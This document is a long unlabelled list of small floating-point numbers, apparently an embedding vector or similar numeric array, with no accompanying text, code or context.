-0.006407757289707661, -0.006264452822506428, -0.0390443280339241, 0.026269758120179176, -0.020488444715738297, -0.02171676978468895, 0.036096349358558655, -0.009114164859056473, 0.00029070337768644094, 0.0019284688169136643, -0.02448459342122078, -0.03694798797369003, 0.0014473751652985811, -0.009417151100933552, -0.03645665943622589, -0.00415378250181675, 0.01734393648803234, 0.0127418152987957, -0.0068622371181845665, 0.026957619935274124, 0.011022161692380905, 0.017491335049271584, -0.042974963784217834, 0.0020379943307489157, 0.01001493539661169, -0.020734110847115517, 0.0038794567808508873, 0.011185937561094761, -0.01508381962776184, 0.02245376445353031, -0.002814909443259239, 0.025123322382569313, -0.026466289535164833, -0.0029234113171696663, -0.0206194669008255, 0.015329484827816486, 0.00301962997764349, 0.02784201316535473, 0.004430155735462904, -0.014813588000833988, -0.007279867306351662, -0.01241426169872284, 0.015444127842783928, -0.029790952801704407, -0.04290945455431938, -0.01952216401696205, 0.01978420652449131, -0.01635308749973774, 0.009777459315955639, 0.006845859345048666, -0.0010189971653744578, -0.034655116498470306, 0.002155708847567439, -0.015288540162146091, 0.010055880062282085, -0.005142583511769772, 0.011013972572982311, 0.004397400189191103, -0.02707226201891899, -0.0026019997894763947, 0.021847790107131004, -0.011980254203081131, -0.00037873326800763607, 0.010072257369756699, -0.004606215283274651, 0.02933237887918949, 0.00720616802573204, 0.000394343223888427, 0.01287283655256033, 0.008500002324581146, 0.0018670526333153248, 0.0007917572511360049, 0.03126494213938713, 0.0073986053466796875, 0.006112959701567888, 0.008565513417124748, 0.0091796750202775, 0.013929194770753384, 0.03472062572836876, -0.001233442104421556, -0.028726406395435333, -0.039437390863895416, 0.01584538072347641, 0.02456648088991642, 0.006444606930017471, -0.0021495672408491373, -0.003275530878454447, -0.024861279875040054, 0.013003857806324959, -0.027105018496513367, 0.003815993433818221, -0.018424861133098602, 0.006821292918175459, 0.004855974577367306, -0.02748170495033264, -0.01131695881485939, -0.0022867301013320684, 0.03560502082109451, 0.041959550231695175, -0.042876698076725006, -0.016041912138462067, 0.0014954846119508147, 0.005928711034357548, -0.011660889722406864, -0.014355014078319073, -0.01718015968799591, 0.0068581425584852695, 0.004348267335444689, -0.0033512774389237165, -0.04533334821462631, -0.009089598432183266, -0.001181238330900669, 0.024795768782496452, -0.0179499089717865, 0.03662043437361717, 0.002309249248355627, -0.01793353073298931, -0.0006878614658489823, 0.0017083940329030156, 0.03553951159119606, 0.022077077999711037, -0.007140657398849726, 0.0153786176815629, 0.02757997065782547, -0.012013009749352932, -0.01903083361685276, 0.02448459342122078, -0.014838154427707195, -0.0088029894977808, -0.004200868308544159, -0.007410888560116291, 0.005842728074640036, 0.025188831612467766, -0.005584780126810074, -0.0008117174729704857, 0.006940030958503485, -0.01742582395672798, 0.022912338376045227, 0.007288056425750256, 0.026613688096404076, 0.00506888423115015, 0.0018076836131513119, 0.022617541253566742, -0.0038733151741325855, 0.01878516934812069, -0.013798173516988754, -0.02984008565545082, 0.016164744272828102, 0.03671870008111, 0.0009166368399746716, 0.02138921618461609, 0.006669799797236919, -0.001036910223774612, 0.007934973575174809, -0.0034986764658242464, -0.011218693107366562, -0.0073699443601071835, -0.023616578429937363, 0.028185943141579628, -0.038094423711299896, 0.01701638288795948, 0.03511369228363037, 0.020766865462064743, 0.003191595431417227, -0.004991090390831232, 0.003987958654761314, -0.023600200191140175, -0.02841523103415966, -0.027858389541506767, -0.03655492514371872, -0.012807325460016727, -0.003975675441324711, -0.017540467903017998, 0.013265900313854218, -0.014698944985866547, 0.005928711034357548, -0.0011587190674617887, 0.003963392227888107, -0.008688345551490784, -0.002427987288683653, -0.029053958132863045, 0.0006924676708877087, 0.0131185008212924, 0.0020482304971665144, -0.0077957636676728725, -0.012045764364302158, 0.010530832223594189, 0.009703760035336018, 0.005441475659608841, -0.013265900313854218, -0.03160887211561203, 0.0032960029784590006, -0.02214258909225464, 0.0045488933101296425, -0.0023215324617922306, -0.0284971185028553, -0.0005967607721686363, -0.007582854013890028, -0.0018148488597944379, -0.017327558249235153, -0.022863205522298813, -0.01785164326429367, -0.014993743039667606, -0.010113202035427094, -0.0009381325216963887, 0.00408622482791543, -0.014641623012721539, 0.024943167343735695, 0.005953277461230755, -0.03255877643823624, 0.020226404070854187, 0.011284204199910164, 0.011619945988059044, -0.0001703020097920671, 0.00026716047432273626, -0.022191721946001053, -0.004319606348872185, 0.0004503855016082525, 0.009335262700915337, 0.01541956141591072, 0.0016408362425863743, 0.0016510722925886512, -0.004323700908571482, 0.003979770001024008, -0.002954119350761175, -0.010096823796629906, 0.009114164859056473, 0.0021352367475628853, 0.01911272294819355, 0.010817441157996655, -0.008025051094591618, -0.029201358556747437, -0.00917148683220148, 0.011505302041769028, 0.008086467161774635, -0.011243259534239769, 0.031723517924547195, -0.005060695111751556, -0.006608383730053902, 0.008102844469249249, -0.02171676978468895, -0.009359829127788544, 0.011562624014914036, 0.027399815618991852, 0.0003889692889060825, -0.01929287612438202, 0.016705207526683807, -0.014977364800870419, 0.011693645268678665, 0.006137526128441095, 0.003605131059885025, -0.023010604083538055, -0.019129101186990738, -0.023452801629900932, 0.025008678436279297, 0.02776012383401394, 0.003801662940531969, 0.0011935215443372726, -0.0020482304971665144, -0.00048314081504940987, 0.0014443043619394302, -0.008835744112730026, -0.014731700532138348, -0.0017534326761960983, -0.009122353047132492, -0.007930879481136799, -0.004133310634642839, -0.0029909692239016294, 0.00048544391756877303, 0.002634755102917552, 0.011955687776207924, 0.02515607699751854, 0.010203278623521328, 0.011726400814950466, -0.008409925736486912, -0.026777464896440506, 0.022568408399820328, 0.014960987493395805, -0.01986609399318695, 0.021520238369703293, 0.00964643806219101, 0.019227366894483566, -0.0024566480424255133, 0.0018097307765856385, 0.04697111248970032, 0.011538057588040829, -0.03162525221705437, 0.004196773748844862, -0.012381507083773613, 0.022437386214733124, 0.007681119721382856, 0.007857179269194603, -0.0012692682212218642, -0.002950025023892522, -0.0006929794908501208, -0.0020482304971665144, -0.024206172674894333, -0.0019427991937845945, -0.00029275057022459805, -0.023403668776154518, 0.007803952321410179, 0.006813104264438152, 0.03218208998441696, 0.0036501698195934296, 0.020832376554608345, 0.003926542587578297, -0.011628134176135063, -0.007283961866050959, 0.013732663355767727, -0.014862721785902977, -0.011300581507384777, -0.0005855011404491961, -0.020013494417071342, -0.0020789385307580233, -0.02723603881895542, 0.017720622941851616, 0.012471583671867847, -0.0016346946358680725, 0.004901012871414423, 0.012053953483700752, -0.016918117180466652, -0.010227845050394535, 0.0029090808238834143, -0.02263391762971878, -0.007046485785394907, 0.011546246707439423, -0.0026675104163587093, -0.005097544752061367, 0.014305881224572659, -0.003904023440554738, -0.007574665360152721, 0.00893401075154543, 0.006219414062798023, -0.016713395714759827, -0.002102481434121728, -0.021520238369703293, -0.013462431728839874, 0.0017749282997101545, -0.003490487579256296, 0.00800867285579443, -0.0018946898635476828, 0.018572259694337845, -0.007054674439132214, -0.02304336056113243, 0.015599715523421764, 0.0176059789955616, -0.005175338592380285, 0.006907275877892971, 0.01677071861922741, -0.0023317686282098293, -0.010850195772945881, 0.008884877897799015, -0.018261084333062172, 0.013036612421274185, 0.003658358473330736, -0.003766860580071807, -0.03711176663637161, 0.0042418125085532665, -0.021241817623376846, 0.006248075049370527, 0.0043851169757544994, 0.005662573967128992, -0.01144798006862402, -0.013306844048202038, -0.01793353073298931, -0.006174375768750906, 0.0013757229316979647, -0.002855853410437703, -0.014125727117061615, -0.01988247223198414, 0.005953277461230755, -0.007619703654199839, -0.003580564633011818, 0.033328525722026825, 0.019833339378237724, -0.03393450006842613, -0.008418113924562931, 0.009449906647205353, 0.022437386214733124, 0.012618983164429665, 0.012733626179397106, 0.013822739943861961, 0.015689792111516, -0.0005798713536933064, 0.020439311861991882, -0.0041292160749435425, 0.00007440317131113261, -0.012103086337447166, 0.0024116095155477524, 0.005523364059627056, -0.0036522168666124344, -0.015869947150349617, 0.01894894614815712, 0.0005609346553683281, -0.009900292381644249, -0.0019745309837162495, 0.0045816488564014435, 0.01944027654826641, 0.00368701945990324, 0.0013009998947381973, 0.008078278042376041, -0.016582375392317772, -0.005764934234321117, 0.034655116498470306, -0.012561661191284657, -0.008332131430506706, -0.02163488231599331, 0.009040465578436852, 0.028382474556565285, -0.011120427399873734, -0.011423413641750813, -0.010948462411761284, -0.005351398605853319, 0.006301302462816238, -0.009449906647205353, -0.015869947150349617, 0.03773411735892296, 0.00830347090959549, -0.004819124937057495, -0.014477846212685108, 0.009253374300897121, 0.0003976699081249535, 0.008180638775229454, 0.016074668616056442, 0.0006822316790930927, -0.03247688710689545, -0.02733430452644825, 0.0039900061674416065, -0.013929194770753384, -0.004286850802600384, 0.009957613423466682, 0.003951109014451504, 0.012373317964375019, 0.016328521072864532, 0.006227603182196617, -0.002929552923887968, 0.010129579342901707, 0.010588153265416622, 0.03714451938867569, -0.02497592382133007, 0.006993258371949196, 0.009883914142847061, 0.02045569010078907, 0.0038876456674188375, -0.024107906967401505, -0.0044096834026277065, 0.0030360077507793903, 0.017655111849308014, 0.0023031076416373253, -0.005007467698305845, 0.006350435316562653, -0.008070088922977448, 0.0018332736799493432, 0.00004411090776557103, -0.008622835390269756, -0.03580155223608017, 0.010629097931087017, 0.0002474561333656311, -0.00981021486222744, -0.004651254042983055, 0.035080935806035995, 0.00020958279492333531, 0.002141378354281187, -0.01635308749973774, 0.02111079730093479, -0.010694608092308044, 0.012758192606270313, 0.01458430103957653, -0.004524326883256435, 0.02466474659740925, 0.000008008896656974684, -0.007083335425704718, -0.025680162012577057, -0.01518208533525467, -0.03305010497570038, -0.007251206319779158, -0.00637090764939785, 0.024255305528640747, 0.01695087179541588, 0.0077671026811003685, 0.005584780126810074, 0.015165708027780056, 0.004995184484869242, 0.005895955488085747, 0.012987479567527771, -0.0068908981047570705, 0.018801547586917877, 0.005175338592380285, 0.014936421066522598, 0.013012045994400978, 0.010301544331014156, 0.004868257790803909, -0.01114499382674694, 0.010760119184851646, -0.017327558249235153, 0.00027279031928628683, 0.002299013314768672, -0.008229771628975868, 0.0018097307765856385, -0.008057805709540844, -0.0026900297962129116, -0.01039981096982956, -0.03141234070062637, 0.0250741895288229, -0.009630060754716396, 0.011881988495588303, -0.026941241696476936, 0.012717248871922493, -0.02222447656095028, 0.007365850266069174, 0.01525578461587429, -0.006465079262852669, -0.032067447900772095, 0.006293113809078932, 0.014346824958920479, 0.009024087339639664, 0.0007615609210915864, 0.02984008565545082, 0.005093450658023357, -0.004372833762317896, -0.008282998576760292, -0.005638007540255785, -0.005375965032726526, 0.003709538606926799, 0.018932567909359932, -0.008192921988666058, 0.011349714361131191, 0.0063586244359612465, -0.022257233038544655, 0.00765245920047164, -0.003963392227888107, 0.00854913517832756, 0.0176059789955616, -0.0005404626135714352, -0.014019272290170193, 0.0021598031744360924, 0.011996631510555744, 0.005588874686509371, 0.023420045152306557, -0.01525578461587429, 0.004855974577367306, 0.002382948761805892, 0.001324542798101902, -0.008328037336468697, 0.00829937681555748, 0.016541430726647377, 0.0074026999063789845, 0.009261563420295715, -0.0039613451808691025, 0.010629097931087017, 0.0029459306970238686, -0.00002915670302172657, -0.0012938346480950713, -0.007922690361738205, -0.004602120723575354, -0.005048411898314953, -0.026433534920215607, 0.02112717367708683, -0.00475770840421319, -0.007611515000462532, 0.011284204199910164, -0.00687042623758316, 0.010784685611724854, -0.0027268794365227222, 0.01845761574804783, -0.0052531324326992035, 0.009720138274133205, -0.010833818465471268, -0.005191716365516186, -0.012815514579415321, 0.014436902478337288, 0.007283961866050959, -0.0017534326761960983, 0.0012109228409826756, -0.02138921618461609, 0.006088392809033394, -0.02063584513962269, -0.000543021596968174, 0.0062972079031169415, -0.0052899825386703014, -0.009949425235390663, 0.01357707567512989, 0.004467005375772715, -0.004602120723575354, 0.006952314171940088, 0.0004959358484484255, -0.00981021486222744, -0.004671725910156965, 0.01617293432354927, 0.012422450818121433, -0.010932084172964096, 0.0047454251907765865, -0.028611762449145317, -0.005629818886518478, 0.011890176683664322, 0.003062621457502246, 0.019079966470599174, 0.00931069627404213, 0.021323705092072487, -0.015165708027780056, -0.0012969054514542222, 0.0016070572892203927, 0.019816961139440536, -0.001219111611135304, -0.01341329887509346, 0.012430639937520027, -0.020210025832057, 0.0024689314886927605, 0.017212914302945137, 0.009662816300988197, 0.010186901316046715, -0.005658479407429695, 0.008442681282758713, -0.007419077213853598, -0.0176059789955616, 0.0104816984385252, 0.003760718973353505, 0.0036911137867718935, -0.02481214702129364, 0.013347788713872433, 0.006301302462816238, 0.00026140271802432835, 0.008770233951508999, -0.02206069976091385, -0.0002020337269641459, 0.03635839372873306, 0.006280830595642328, -0.0028967976104468107, 0.050082866102457047, -0.008274809457361698, 0.0013798173749819398, -0.014658000320196152, -0.01001493539661169, -0.02222447656095028, -0.0075992317870259285, 0.019178234040737152, -0.012348751537501812, -0.005191716365516186, 0.0015354050556197762, 0.026531800627708435, 0.011521680280566216, 0.00040022892062552273, -0.006072015501558781, 0.004454722162336111, -0.014027461409568787, -0.002964355517178774, -0.020062627270817757, -0.017802510410547256, -0.009630060754716396, 0.0035764703061431646, -0.012987479567527771, -0.011791910976171494, -0.003654264146462083, -0.0030114410910755396, -0.002034923527389765, -0.007488682400435209, 0.01885068044066429, -0.009130542166531086, 0.02733430452644825, -0.0033860800322145224, -0.005527458153665066, 0.015132952481508255, -0.01711464859545231, -0.006739404983818531, -0.02699037455022335, 0.0005880601238459349, 0.00236861826851964, -0.0072020734660327435, -0.013069367967545986, 0.011587190441787243, -0.014125727117061615, 0.025090565904974937, 0.009752892889082432, -0.0088029894977808, -0.009114164859056473, -0.02305973693728447, 0.007263489533215761, 0.0024013735819607973, -0.002133189467713237, 0.02230636589229107, -0.02455010451376438, 0.002118858974426985, 0.005506986286491156, -0.013134879060089588, -0.0022683050483465195, 0.011439791880548, 0.00931069627404213, -0.0008485672296956182, -0.002632708055898547, 0.0009606517851352692, 0.006260358262807131, -0.022240854799747467, 0.014600679278373718, 0.0035682814195752144, 0.0064937397837638855, 0.0006290042656473815, -0.012053953483700752, 0.004909201990813017, -0.0016234349459409714, -0.019063590094447136, 0.0015108386287465692, -0.002110670320689678, 0.006289019249379635, -0.018375728279352188, 0.017081893980503082, 0.023026982322335243, -0.021356461569666862, -0.04952602833509445, -0.010416188277304173, 0.004192679654806852, 0.022863205522298813, 0.005023845471441746, 0.014223992824554443, -0.00850819144397974, 0.009744704701006413, 0.0014934373321011662, 0.021700391545891762, -0.012979291379451752, -0.02011176012456417, -0.010080446489155293, 0.02841523103415966, 0.007116090971976519, -0.0068581425584852695, -0.009065032005310059, 0.0015180038753896952, -0.000403043843107298, 0.02717052772641182, -0.008827555924654007, 0.004806841723620892, 0.01953854225575924, -0.01762235537171364, 0.036096349358558655, 0.011349714361131191, -0.002413656795397401, -0.003527337219566107, -0.01383911818265915, -0.0010435637086629868, 0.015198463574051857, -0.00930250808596611, 0.03498267009854317, 0.012103086337447166, -0.009621871635317802, -0.0029868746642023325, 0.021421972662210464, 0.0019960266072303057, -0.005032034125179052, -0.013093934394419193, -0.018326595425605774, 0.016615130007267, -0.00603925995528698, 0.015493260696530342, -0.00046266874414868653, -0.010211467742919922, 0.004258190281689167, 0.001755479839630425, -0.015288540162146091, -0.008909444324672222, -0.0014135963283479214, -0.032001934945583344, 0.0037934742867946625, -0.014395957812666893, -0.0007830566028133035, 0.007193884812295437, 0.019489409402012825, 0.02279769442975521, -0.012758192606270313, -0.003230492351576686, -0.019391143694519997, 0.013020235113799572, -0.02984008565545082, 0.0013204483548179269, 0.01257803849875927, 0.006178470328450203, -0.014273125678300858, -0.015804436057806015, 0.03144509717822075, -0.0005368799902498722, 0.008893066085875034, -0.03352505713701248, 0.0035928478464484215, 0.014486035332083702, -0.015206651762127876, 0.004532516002655029, -0.007324906066060066, -0.01324133388698101, 0.00963824987411499, -0.0005517222452908754, 0.009449906647205353, -0.01194749865680933, 0.015329484827816486, 0.0040411860682070255, 0.00440558884292841, -0.0019284688169136643, -0.015706170350313187, -0.01358526386320591, 0.029741819947957993, -0.0037361523136496544, 0.008086467161774635, 0.01903083361685276, -0.030052995309233665, -0.003191595431417227, 0.0049214852042496204, 0.014993743039667606, -0.007419077213853598, -0.005359587259590626, 0.0003303679986856878, 0.014559734612703323, 0.0003285766870249063, -0.009531795047223568, 0.004655348137021065, -0.006751688197255135, 0.006166186649352312, 0.02104528620839119, 0.007140657398849726, -0.0058263507671654224, 0.002534442115575075, 0.014772644266486168, -0.016631508246064186, -0.005273604765534401, -0.0101377684623003, 0.01701638288795948, 0.00854913517832756, 0.008835744112730026, -0.015812626108527184, 0.008729290217161179, -0.0005839657387696207, -0.004516138229519129, -0.009548172354698181, -0.007185695692896843, -0.006243980955332518, 0.011783722788095474, 0.012168597429990768, -0.005564308259636164, -0.004864163231104612, -0.0016357182757928967, -0.008614646270871162, 0.01157081313431263, -0.003889692947268486, -0.026810219511389732, 0.01341329887509346, 0.016787094995379448, -0.018588637933135033, 0.007107901852577925, -0.0008864405681379139, -0.006976880598813295, 0.001692016376182437, -0.007435454986989498, -0.019653184339404106, -0.014052027836441994, -0.0025733390357345343, -0.008233865723013878, 0.01944027654826641, -0.018473993986845016, -0.0023133435752242804, 0.030052995309233665, 0.008450869470834732, 0.015280351974070072, 0.006784443277865648, -0.019145477563142776, 0.011300581507384777, 0.01608285680413246, 0.012340562418103218, 0.0007088453276082873, -0.0005911309854127467, 0.00938439555466175, -0.005318643059581518, 0.0002100946003338322, -0.010833818465471268, 0.009015899151563644, 0.011800100095570087, 0.003801662940531969, 0.01324952207505703, -0.007861274294555187, 0.009531795047223568, 0.012094898149371147, -0.009965802542865276, 0.035080935806035995, -0.030380548909306526, -0.0021004341542720795, -0.01207033172249794, -0.010743740946054459, 0.007124279625713825, 0.009097786620259285, -0.025418119505047798, 0.021159930154681206, -0.0052817934192717075, 0.012209541164338589, 0.022175343707203865, 0.011251448653638363, -0.0021782279945909977, 0.01408478245139122, 0.022699428722262383, 0.00023453313042409718, -0.0066657052375376225, -0.012971102260053158, -0.0029868746642023325, 0.0016981579829007387, 0.008631023578345776, -0.004954240284860134, 0.02910309098660946, -0.002806720556691289, -0.012676304206252098, 0.013724474236369133, 0.011865610256791115, -0.0051139225251972675, 0.011087671853601933, -0.0061293370090425014, -0.003412693738937378, 0.002757587470114231, -0.0026572744827717543, -0.0011761202476918697, 0.020177269354462624, -0.0010384456254541874, -0.013151256367564201, 0.010579965077340603, 0.007161129266023636, 0.005355493165552616, 0.005339115392416716, 0.0012027339544147253, 0.014477846212685108, 0.023010604083538055, 0.009376207366585732, 0.0036849721800535917, -0.010129579342901707, -0.014191237278282642, 0.004512043669819832, 0.001541546662338078, 0.011063105426728725, -0.02572929486632347, 0.019587675109505653, -0.00871291197836399, -0.0006146738305687904, 0.0033410415053367615, -0.02045569010078907, 0.0016265057493001223, -0.0007717969710938632, 0.004434249829500914, 0.003664500080049038, -0.0006740428507328033, 0.020734110847115517, -0.020259158685803413, 0.009236996993422508, -0.0035150540061295033, -0.025172455236315727, -0.0001911579311126843, 0.018965324386954308, -0.010563586838543415, -0.008704722858965397, -0.016041912138462067, 0.004059610888361931, 0.03390174359083176, -0.015075630508363247, -0.024779390543699265, -0.008491814136505127, -0.02228998765349388, 0.0005573520320467651, -0.008078278042376041, 0.0042418125085532665, -0.015001931227743626, 0.0059614661149680614, -0.004082130268216133, -0.007648364640772343, 0.0011372233275324106, 0.020406557247042656, 0.003451590659096837, 0.010891140438616276, 0.023780353367328644, 0.012209541164338589, -0.0035969424061477184, 0.026466289535164833, -0.004262284375727177, 0.01027697790414095, -0.006022882182151079, 0.00458574341610074, 0.017556846141815186, 0.017736999318003654, -0.0016520959325134754, 0.009703760035336018, 0.012864647433161736, 0.004043233580887318, 0.020226404070854187, -0.03976494446396828, -0.010923895053565502, -0.007292150519788265, -0.009400773793458939, -0.012119464576244354, -0.00001240319397766143, 0.011677267961204052, -0.01695087179541588, 0.004262284375727177, 0.033672455698251724, 0.0202755369246006, 0.0054496643133461475, -0.009777459315955639, 0.00964643806219101, -0.0008889995515346527, 0.005380059592425823, 0.015288540162146091, -0.00030298662022687495, -0.003850796027109027, -0.012594415806233883, -0.003146556904539466, -0.03694798797369003, -0.0027739652432501316, 0.003760718973353505, -0.007853085175156593, 0.0048887296579778194, -0.00926975253969431, 0.018916191533207893, -0.014887288212776184, -0.001243678154423833, -0.00012731067545246333, -0.017818888649344444, 0.012373317964375019, -0.01370809692889452, -0.0012518669245764613, -0.014273125678300858, -0.01921098865568638, -0.0011965923476964235, 0.011357903480529785, 0.00555202504619956, 0.017081893980503082, 0.0050852615386247635, -0.0027514458633959293, 0.000994942500256002, -0.0031629344448447227, -0.005543835926800966, 0.0007922690128907561, -0.004634876269847155, 0.0009171486599370837, 0.03917535021901131, -0.010465321131050587, 0.009245186112821102, 0.0042131515219807625, 0.003994100261479616, -0.00012008147314190865, 0.004262284375727177, -0.01994798332452774, 0.00294388341717422, 0.010719174519181252, -0.01744220219552517, 0.004573460202664137, -0.012086709029972553, -0.03409827500581741, -0.002904986497014761, -0.022683050483465195, 0.0019990974105894566, 0.008332131430506706, 0.005191716365516186, -0.00456936564296484, 0.012496150098741055, -0.011595379561185837, -0.0059942216612398624, -0.013446054421365261, 0.00004238357723806985, 0.013274088501930237, 0.02379673160612583, 0.003996147774159908, 0.010670041665434837, 0.0016858747694641352, 0.02188054658472538, 0.02984008565545082, 0.01001493539661169, -0.007554193027317524, 0.004774086177349091, 0.012528905645012856, 0.00930250808596611, 0.023354535922408104, 0.0007881746278144419, -0.0023460988886654377, -0.02482852339744568, -0.015116575174033642, -0.009204241447150707, -0.0010082493536174297, 0.01695087179541588, 0.008688345551490784, -0.005429192446172237, 0.02111079730093479, 0.007132468279451132, 0.013634397648274899, -0.031395964324474335, -0.010162334889173508, 0.005842728074640036, 0.0016735915560275316, -0.031330451369285583, 0.016467731446027756, 0.012643549591302872, -0.006428229156881571, 0.01952216401696205, -0.007824424654245377, -0.008442681282758713, 0.01455154549330473, -0.016615130007267, 0.010923895053565502, 0.0016797331627458334, -0.035179201513528824, 0.028447985649108887, 0.0013613925548270345, -0.00720616802573204, 0.019014457240700722, 0.007803952321410179, 0.0250741895288229, -0.009277941659092903, 0.007869462482631207, -0.004982901271432638, 0.00967919360846281, 0.0029520723037421703, 0.007898123934864998, 0.019653184339404106, -0.0014975317753851414, -0.009056842885911465, 0.0025938109029084444, 0.013323222286999226, -0.0004219805123284459, -0.017294803634285927, 0.016467731446027756, -0.02723603881895542, 0.03632563725113869, -0.01693449541926384, 0.0038835513405501842, 0.012315995991230011, 0.005916427820920944, -0.03187091648578644, 0.0010471462737768888, -0.03629288077354431, -0.01127601508051157, 0.006125242915004492, -0.0034454490523785353, -0.0006330987089313567, -0.00917148683220148, 0.006714838091284037, -0.019898850470781326, 0.003820087993517518, 0.00019307719776406884, 0.0034884402994066477, -0.001664379145950079, 0.0022089360281825066, 0.012496150098741055, -0.010637286119163036, 0.020815998315811157, 0.005302265752106905, 0.005203999578952789, 0.02497592382133007, 0.00022711200290359557, -0.019047211855649948, 0.004712670110166073, 0.009458095766603947, -0.011357903480529785, 0.008958577178418636, 0.038028914481401443, -0.008663779124617577, -0.009662816300988197, -0.012135841883718967, 0.013216767460107803, 0.016819851472973824, -0.0042459070682525635, 0.01609104499220848, 0.0011628135107457638, 0.006280830595642328, -0.01726204715669155, 0.008057805709540844, -0.018965324386954308, -0.008950388059020042, 0.006436418276280165, 0.0262370016425848, 0.001107538933865726, 0.008029145188629627, 0.015288540162146091, -0.007640175987035036, -0.007828518748283386, -0.025680162012577057, -0.00008489510946674272, -0.0014944609720259905, -0.014592490158975124, -0.004991090390831232, 0.018359350040555, -0.00913873128592968, -0.013298654928803444, 0.0035150540061295033, -0.0007226640009321272, -0.004335984122008085, 0.02857900597155094, -0.01709827035665512, -0.00704239122569561, 0.019849717617034912, -0.012463394552469254, 0.023927753791213036, 0.006592005956918001, -0.01878516934812069, 0.006714838091284037, -0.0030851406045258045, 0.004303228575736284, 0.00019499644986353815, 0.01811368577182293, 0.007685214281082153, 0.007300339639186859, -0.011382469907402992, -0.012430639937520027, -0.007107901852577925, 0.001201710430905223, 0.004790463950484991, -0.0018998079467564821, -0.002800578949972987, -0.006911369971930981, 0.005310454405844212, 0.022781318053603172, -0.01602553389966488, 0.01768786646425724, -0.022273609414696693, -0.00540462601929903, -0.01903083361685276, 0.014797210693359375, 0.0012569850077852607, 0.0006893968675285578, 0.008688345551490784, 0.0014463516417890787, -0.00011419575457694009, -0.004937862977385521, -0.008590079843997955, -0.020815998315811157, -0.003402457805350423, 0.002884514397010207, 0.0030994710978120565, -0.0004790464008692652, 0.0030912822112441063, 0.001958153210580349, -0.0020861036609858274, 0.014592490158975124, -0.022502897307276726, -0.006579722743481398, -0.019391143694519997, -0.0008188827196136117, -0.0091796750202775, -0.014576112851500511, 0.014821777120232582, -0.014477846212685108, 0.003398363245651126, -0.02792390063405037, -0.031739894300699234, 0.015067442320287228, 0.003560092533007264, 0.02138921618461609, 0.007128374185413122, -0.014944609254598618, 0.0005094985826872289, 0.00377095490694046, -0.0035682814195752144, -0.004802747163921595, -0.001086043193936348, -0.01986609399318695, 0.02550000697374344, 0.004634876269847155, 0.002855853410437703, -0.015829002484679222, -0.0017421729862689972, 0.017147403210401535, 0.009630060754716396, -0.00963824987411499, -0.009654627181589603, 0.00813969410955906, 0.014526979066431522, -0.0011658843141049147, -0.00854913517832756, 0.004417872056365013, 0.004393305629491806, -0.026679199188947678, 0.015034686774015427, 0.007885840721428394, -0.01643497683107853, -0.034000009298324585, -0.005056601017713547, 0.004426061175763607, -0.00897495448589325, 0.02615511417388916, 0.001738078542985022, -0.008225676603615284, 0.0006766018341295421, 0.013921006582677364, -0.004790463950484991, -0.007414983119815588, -0.012921969406306744, -0.013871872797608376, 0.00951541680842638, -0.01193931046873331, -0.01026878971606493, 0.008852122351527214, 0.02816956490278244, -0.004671725910156965, -0.006964597385376692, 0.02188054658472538, -0.007500965613871813, -0.003443401772528887, -0.003388127312064171, 0.012037576176226139, -0.023256268352270126, 0.005101639311760664, -0.010973028838634491, 0.022863205522298813, 0.015951834619045258, 0.0280876774340868, -0.018244706094264984, -0.019800584763288498, 0.03537573292851448, 0.0033021445851773024, 0.0056830462999641895, 0.002180275274440646, -0.003662453033030033, 0.0157553032040596, -0.019587675109505653, -0.014567923732101917, 0.008090561255812645, -0.007111996412277222, -0.01660694181919098, -0.009965802542865276, 0.0018353208433836699, 0.015149330720305443, -0.022502897307276726, -0.014199426397681236, 0.0001616013905731961, 0.030789989978075027, -0.01819557324051857, 0.0009314790950156748, -0.006440512370318174, -0.02690848521888256, 0.011005783453583717, 0.00574036780744791, -0.021078040823340416, -0.014322258532047272, 0.005474231205880642, 0.00013230074546299875, -0.004692197777330875, 0.01287283655256033, -0.0005343209486454725, -0.0026920768432319164, -0.003066715784370899, 0.01667245291173458, -0.019685940816998482, 0.017032761126756668, 0.014027461409568787, -0.0006177446339279413, -0.009245186112821102, -0.005461947526782751, 0.009613683447241783, 0.005363681819289923, 0.019407520070672035, 0.0028681366238743067, 0.01244701724499464, -0.02011176012456417, 0.008160166442394257, -0.016729773953557014, 0.009449906647205353, -0.004159924108535051, 0.013012045994400978, -0.013052990660071373, -0.020406557247042656, -0.019604051485657692, -0.031985558569431305, 0.002565150149166584, 0.02002987079322338, 0.02045569010078907, -0.008106938563287258, -0.004159924108535051, 0.015575149096548557, 0.0025938109029084444, 0.013347788713872433, 0.011931121349334717, 0.007722063921391964, 0.013380543328821659, -0.021749524399638176, -0.0036665473598986864, 0.0028681366238743067, 0.0013624160783365369, 0.00506888423115015, 0.009261563420295715, 0.017376691102981567, 0.016451353207230568, -0.00668617757037282, -0.00009321188554167747, 0.009777459315955639, 0.022077077999711037, -0.01617293432354927, 0.019178234040737152, 0.005736273247748613, -0.0250741895288229, -0.024075152352452278, -0.01996436156332493, 0.009933046996593475, -0.009327074512839317, -0.001650048652663827, 0.013061179779469967, 0.008434492163360119, -0.020390179008245468, 0.0015753256157040596, 0.009818403981626034, 0.008876688778400421, 0.03947014734148979, 0.00351095967926085, -0.000802505062893033, 0.021143551915884018, 0.0018138252198696136, 0.00351095967926085, 0.0013480857014656067, -0.01944027654826641, 0.02332177944481373, 0.002900891937315464, -0.009499039500951767, -0.007816235534846783, -0.0011085624573752284, -0.007341283373534679, 0.010383432731032372, 0.011710022576153278, 0.03160887211561203, -0.004155830014497042, -0.002348146168515086, -0.009597305208444595, 0.004055516794323921, 0.00004104009713046253, 0.012324185110628605, 0.010367055423557758, -0.011546246707439423, 0.0023665709886699915, 0.01001493539661169, -0.015583338215947151, -0.019604051485657692, 0.005191716365516186, 0.00588776683434844, 0.013331410475075245, 0.035768795758485794, 0.0012641502544283867, -0.0009821474086493254, 0.010784685611724854, 0.004229529295116663, 0.01894894614815712, -0.00943352933973074, -0.014183049090206623, 0.007071052212268114, -0.019571296870708466, 0.0015845380257815123, 0.0004176301881670952, -0.008282998576760292, -0.0064978343434631824, -0.016467731446027756, 0.017966287210583687, -0.0012774569913744926, 0.01114499382674694, -0.008205205202102661, -0.01211127545684576, -0.011890176683664322, -0.0011474593775346875, 0.0006187682738527656, -0.022584784775972366, -0.020242780447006226, -0.012717248871922493, 0.015370428562164307, 0.03036417067050934, 0.00010575102351140231, -0.003482298692688346, -0.0004127680731471628, 0.012307806871831417, 0.01253709476441145, -0.04100964590907097, 0.010792873799800873, 0.029299624264240265, -0.023092493414878845, 0.001972483703866601, 0.005638007540255785, 0.02088150940835476, 0.023190759122371674, 0.010506264865398407, -0.009114164859056473, 0.019227366894483566, 0.004340078216046095, 